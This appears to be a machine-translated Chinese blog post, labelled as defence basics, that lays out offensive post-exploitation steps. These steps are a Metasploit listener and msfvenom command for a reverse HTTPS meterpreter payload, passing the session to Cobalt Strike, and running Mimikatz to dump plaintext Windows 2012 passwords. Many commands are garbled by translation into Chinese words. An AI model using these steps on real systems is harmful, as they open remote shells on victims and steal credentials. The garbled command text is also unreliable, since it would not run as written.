防御保护基础?防御和保护的区别

防御保护基础cs与msf权限传递
1. 在Metasploit中获取会话 # 在Metasploit中设置监听器 use exploit/multi/handler set payload windows/meterpreter/reve

cs与msf权限传递

1. 与Metasploit 进行会话

# 使用Metasploit 配置监听器

使用漏洞/多重/处理程序

负载设置windows/meterpreter/reverse_https

设置LHOST [Metasploit 主机IP]

设置LPORT [选定端口]

开发

# 在目标系统上执行Metasploit生成的payload

# 使用msfvenom 生成可执行文件,例如

msfvenom -p windows/meterpreter/reverse_https LHOST=[Metasploit 主机IP] LPORT=[选定端口] -f exe Payload.exe

2. 通过Cobalt Strike 接收会话

# 使用Cobalt Strike 设置监听器

# 打开Cobalt Strike客户端并连接服务器

#创建一个新的监听器并选择HTTPS beacon

#设置IP和端口,保存并启动监听

# 使用Metasploit 获得的会话在线连接到Cobalt Strike

# 在Metasploit 中,使用以下命令将会话传递给Cobalt Strike

使用exploit/windows/local/payload_inject

负载设置windows/meterpreter/reverse_https

设置LHOST [Metasploit 主机IP]

设置LPORT [选定端口]

设置SESSION [Metasploit 会话ID]

将DisablePayloadHandler 设置为true

开发

mimikatz抓取win2012明文密码

1. 将Mimikatz 上传到Cobalt Strike

# 将Mimikatz 上传到Cobalt Strike 目标系统

上传/path/to/mimikatz.exe

2. 在目标系统上运行Mimikatz。

# 在Cobalt Strike 命令行上运行Mimikatz

运行程序集/path/to/mimikatz.exe

3.使用Mimikatz获取纯文本密码

# 在Mimikatz中,使用以下命令获取明文密码

权限: 调试

sekurlsa: 登录密码

以上基于#防御与保护的相关内容摘自网络,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92744.html

Like (0)
CSDN的头像CSDN
Previous 2024年6月28日
Next 2024年6月28日

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注